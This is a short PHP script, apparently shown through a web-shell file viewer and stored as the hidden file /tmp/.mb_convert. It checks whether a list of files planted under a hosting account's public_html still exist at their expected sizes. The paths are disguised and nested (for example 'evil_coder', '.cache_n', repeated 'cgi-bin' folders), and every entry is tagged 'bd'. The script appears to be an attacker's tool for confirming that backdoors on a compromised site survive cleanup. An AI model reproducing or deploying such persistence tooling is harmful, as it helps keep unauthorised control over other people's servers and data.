| Current File : //tmp/.mb_convert |
<?php $r = '/home/missente/public_html'; $x = ["/cKlZG/upgrades/index/evil_coder/proc/index.error.php"=>"bd@@436553@@635",
"/images/search-api/search-api/search-api/search-api/register_pre.php"=>"bd@@436558@@1061",
"/cgi-bin/cgi-bin/cgi-bin/cgi-bin/.cache_n/inc.php"=>"bd@@417363@@7818",
"/cgi-bin/cgi-bin/cgi-bin/cgi-bin/.cache_n/PEARSax3.php"=>"bd@@451990@@665",
"/cache/requests/requests/requests/banned.inc.php"=>"bd@@439448@@652",
"/cKlZG/upgrades/index/antibots/Forms.php"=>"bd@@439456@@671",
"/adcb74/adcb74/adcb74/adcb74/drm_management.php"=>"bd@@444625@@662",
"/cache/requests/requests/requests/requests/default_wdb.php"=>"bd@@436541@@1016"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');